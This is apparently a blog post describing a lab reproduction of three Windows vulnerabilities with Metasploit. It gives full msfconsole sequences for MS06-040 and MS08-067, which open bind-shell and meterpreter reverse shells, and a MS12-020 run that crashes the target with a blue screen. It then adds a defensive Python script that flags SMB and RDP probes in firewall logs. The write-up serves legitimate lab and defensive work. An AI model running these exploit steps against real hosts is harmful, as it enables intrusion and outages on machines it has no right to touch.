From August through November, moving from Antiy to the new employer, I have now properly settled in and started looking into some new things. Last week I happened to have a bit of spare time, so I reproduced three MSF-series vulnerabilities locally. I took notes along the way and am sharing them here; there are related write-ups online that are also worth reading for reference.
Microsoft Windows Server service remote buffer overflow vulnerability (MS06-040)
#msfconsole
msf > search ms06-040
msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.1*1.1**
RHOST => 192.168.1*1.1**
msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 2222
LPORT => 2222
msf exploit(ms06_040_netapi) > show targets
msf exploit(ms06_040_netapi) > set target 2
msf exploit(ms06_040_netapi) > show options
msf exploit(ms06_040_netapi) > exploit
Microsoft Windows Server service RPC request buffer overflow vulnerability (MS08-067)
#msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1*1.1**
RHOST => 192.168.1*1.1**
msf exploit(ms08_067_netapi) > set LHOST 192.168.1*1.1**
LHOST => 192.168.1*1.1**
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set target 2
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
Microsoft Windows Remote Desktop Protocol (RDP) remote code execution vulnerability (MS12-020)
#msfconsole
msf > search ms12-020
msf exploit(windows/smb/ms08_067_netapi) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.2*7.1**
RHOST => 192.168.2*7.1**
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set LHOST 192.168.2*7.1**
LHOST => 192.168.2*7.1**
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit
Attack result:
[+]192.168.27.1**:3389 - 192.168.27.1**:3389 seems down
Use with caution: it causes a blue screen (BSOD) on the target.
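All three modules above reach the target over one of two services: the two *_netapi modules over SMB (TCP 445) and the MS12-020 module over RDP (TCP 3389, as the "seems down" line shows). From the defender's side, the cheapest signal that one of these is being thrown at a host is inbound traffic to those ports from a machine that has no business talking to them. The script below is an added example written for this post, not code from the post or from Metasploit: it parses Windows Firewall log lines (pfirewall.log layout, assumed from its #Fields header) and reports every inbound TCP attempt on 445 or 3389 from a source outside an allow-list. The log lines, IP addresses and the allow-list are constructed for the example.

```python
"""
Added detection example (not from the original post): flag inbound TCP
connections to the services the three reproduced modules target, SMB/445
(MS06-040 and MS08-067 netapi modules) and RDP/3389 (MS12-020), coming
from hosts that are not on an allow-list. Input is Windows Firewall
pfirewall.log text; the field layout is taken from the file's own
#Fields header, so the parser is not tied to one column order.
"""
import ipaddress
from collections import defaultdict

# Ports used by the three modules in the post, with a label for the alert.
WATCHED_PORTS = {445: "SMB/netapi (MS06-040, MS08-067)",
                 3389: "RDP (MS12-020)"}

# Assumption: management hosts that are allowed to reach these ports.
ALLOWED_SOURCES = {ipaddress.ip_network("192.168.27.10/32")}

# Constructed sample in pfirewall.log format (addresses are made up).
SAMPLE_LOG = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2023-11-12 10:00:01 ALLOW TCP 192.168.27.10 192.168.27.101 50001 3389 0 S 1 0 8192 - - - RECEIVE
2023-11-12 10:00:05 ALLOW TCP 192.168.27.50 192.168.27.101 49152 445 0 S 2 0 8192 - - - RECEIVE
2023-11-12 10:00:05 ALLOW TCP 192.168.27.50 192.168.27.101 49153 445 0 S 3 0 8192 - - - RECEIVE
2023-11-12 10:00:06 DROP TCP 192.168.27.50 192.168.27.101 49154 3389 0 S 4 0 8192 - - - RECEIVE
2023-11-12 10:00:07 ALLOW TCP 192.168.27.101 192.168.27.50 3389 49155 0 S 5 0 8192 - - - SEND
2023-11-12 10:00:08 ALLOW UDP 192.168.27.60 192.168.27.101 137 137 78 - - - - - - - RECEIVE
"""


def parse_pfirewall(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other header lines, or data before any #Fields header
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than misalign
        yield dict(zip(fields, values))


def is_allowed_source(ip):
    """True if the source address falls inside any allow-listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_SOURCES)


def find_suspicious(text):
    """Inbound TCP attempts on watched ports from non-allow-listed sources,
    grouped as (src-ip, dst-port) -> list of (time, action)."""
    hits = defaultdict(list)
    for rec in parse_pfirewall(text):
        # Only traffic arriving at this host matters; SEND lines are replies.
        if rec["path"] != "RECEIVE" or rec["protocol"] != "TCP":
            continue
        try:
            dport = int(rec["dst-port"])
        except ValueError:
            continue
        if dport not in WATCHED_PORTS or is_allowed_source(rec["src-ip"]):
            continue
        hits[(rec["src-ip"], dport)].append((rec["time"], rec["action"]))
    return dict(hits)


def summarize(text):
    """One alert line per (source, port) pair, noting how many got through."""
    lines = []
    for (src, port), events in sorted(find_suspicious(text).items()):
        allowed = sum(1 for _, action in events if action == "ALLOW")
        lines.append(f"{src} -> tcp/{port} [{WATCHED_PORTS[port]}]: "
                     f"{len(events)} attempt(s), {allowed} allowed")
    return lines


if __name__ == "__main__":
    for alert in summarize(SAMPLE_LOG):
        print(alert)
```

Run against the sample, it reports two attempts on 445 and one dropped attempt on 3389 from 192.168.27.50, and stays silent about the allow-listed management host and the host's own outbound replies. The ALLOW count is the part worth acting on: an ALLOW on 445 or 3389 from an unexpected source means the host firewall is not actually shielding the vulnerable service, which is exactly the exposure the modules above depend on.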
All attack steps were carried out in a simulated virtual-machine environment; do not use them for illegal purposes.
Appendix: target VM image (Windows XP) <link: https://pan.baidu.com/s/1YzlDrW1ZltSyuYKGX8j58Q extraction code: 3cxq>